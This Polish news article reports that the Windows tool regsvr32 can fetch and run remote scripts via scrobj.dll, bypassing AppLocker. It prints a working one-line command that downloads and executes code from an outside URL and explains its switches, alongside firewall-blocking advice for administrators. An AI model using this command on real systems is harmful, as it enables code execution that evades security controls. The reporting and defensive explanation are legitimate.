Przejdź na

Regsvr32 uruchamia skrypty z Sieci. Jedną komendą złamiesz Windowsa

Być może to nie błąd, lecz po prostu niezamierzonafunkcjonalność Windowsa. Na pewno jednak odkryte przez CaseyaSmitha działanie systemowego narzędzia Regsvr32, przeznaczonego dorejestrowania plików DLL w Rejestrze wzbudzi spore zainteresowaniezarówno wśród cyberprzestępców, jak i np. uczniów w szkołach.Któż się spodziewał, że pozwoli ono całkowicie obejśćsystemowe zabezpieczenia i uruchamiać w Windowsie dowolne skrypty?

Obraz
Adam Golański

AppLocker wykorzystywany jest już od czasów wprowadzenia narynek Windowsa 7 do blokowania użytkownikom dostępu doniepożądanych skryptów i aplikacji – i do tej pory byłskutecznym sposobem na zamknięcie „okienek”. Okazuje sięjednak, że Regsvr32 (Microsoft Register Server), będący podpisanąprzez Microsoft binarką, domyślnie obecną w systemie, pozwala napobranie z Sieci i uruchomienie dowolnego kodu w JavaScripcie lubVBScripcie i jego uruchomienie. Kod ten zaś może uruchomić dowolnąaplikację w systemie, omijając wszelkie zabezpieczenia Windowsa.

regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll

W przykładzie podanym przez The Register, który jako pierwszypoinformował o tej ciekawej możliwości, regsvr32 wywoływany jestz czterema przełącznikami. /s wycisza komunikaty, /n nakazuje niekorzystać z komponentu DllRegisterServer, /i przekazuje opcjonalnyparametr do funkcji DllInstall (tutaj skrypt, który nakazujeuruchomić konsolę CMD.exe) , zaś /u oznacza próbęodrejestrowania obiektu. Widoczna w wywołaniu biblioteka scrobj.dllto Microsoft Script Component Runtime.

Po co Win+R? Tak też można uruchomić cmd.exe
Po co Win+R? Tak też można uruchomić cmd.exe

Jeśli więc regsvr32 dostanie URL, pod którym znajdować siębędzie plik XML z uruchamialnym kodem, to pobierze go po HTTP lubHTTPS i uruchomi, poprzez próbę odrejestrowania pliku DLL. Nietrzeba tu żadnych specjalnych uprawnień, okna są szeroko otwartedla każdego.

Odkrywca tej „funkcjonalności”, która daje zupełnie nowemożliwości w dziedzinie penetrowania Windowsów, przygotował jużcały zbiór skryptów, które można w ten sposób uruchomić.Możecie je znaleźć naGitHubie – pomogą sprawdzić, na ile Wasze systemy są na topodatne.

Znany ekspert od systemów Microsoftu Alex Ionescu zachwyca sięodkryciem. To w końcu wbudowane w system zdalne uruchamianie kodubez uprawnień administratora, które omija mechanizm białych list,nie pozostawia śladów na dysku, nie dotyka Rejestru i można towszystko w dodatku schować w zaszyfrowanej sesji HTTPS. Jak do tejpory łatek nie ma. Jedyne co pozostaje administratorom, tozablokować dostęp do Sieci dla regsvr32 na poziomie zaporysieciowej.

Źródło artykułu: www.dobreprogramy.pl
Wybrane dla Ciebie
Możesz stracić fanpage. Wyjątkowo autentyczny atak
Możesz stracić fanpage. Wyjątkowo autentyczny atak
Fałszywy SMS. Oszuści podszywają się pod ZUS
Fałszywy SMS. Oszuści podszywają się pod ZUS
Żabka stworzy kartę płatniczą. Wybrała dużego partnera
Żabka stworzy kartę płatniczą. Wybrała dużego partnera
PKO Bank Polski wydał komunikat. Uważaj, kto dzwoni
PKO Bank Polski wydał komunikat. Uważaj, kto dzwoni
Nowości w mObywatelu. Dodano trzy funkcje
Nowości w mObywatelu. Dodano trzy funkcje
Ważny komunikat Alior Banku. Dotyczy wszystkich klientów
Ważny komunikat Alior Banku. Dotyczy wszystkich klientów
Uznański-Wiśniewski: To AI wybiera, co warto przesłać z orbity
Uznański-Wiśniewski: To AI wybiera, co warto przesłać z orbity
Czarna lista w telefonie. Jak zablokować niechciane połączenia?
Czarna lista w telefonie. Jak zablokować niechciane połączenia?
Nowość w Zdjęciach Google. Wygodniejsza edycja fotografii
Nowość w Zdjęciach Google. Wygodniejsza edycja fotografii
Atak hakerski na Booking. Zdobyli dane klientów
Atak hakerski na Booking. Zdobyli dane klientów
Luka 0-day w Adobe Reader. Wystarczy spreparowany PDF
Luka 0-day w Adobe Reader. Wystarczy spreparowany PDF
Zaktualizuj Windowsa: wydano kwietniowe poprawki
Zaktualizuj Windowsa: wydano kwietniowe poprawki
MOŻE JESZCZE JEDEN ARTYKUŁ? ZOBACZ CO POLECAMY 🌟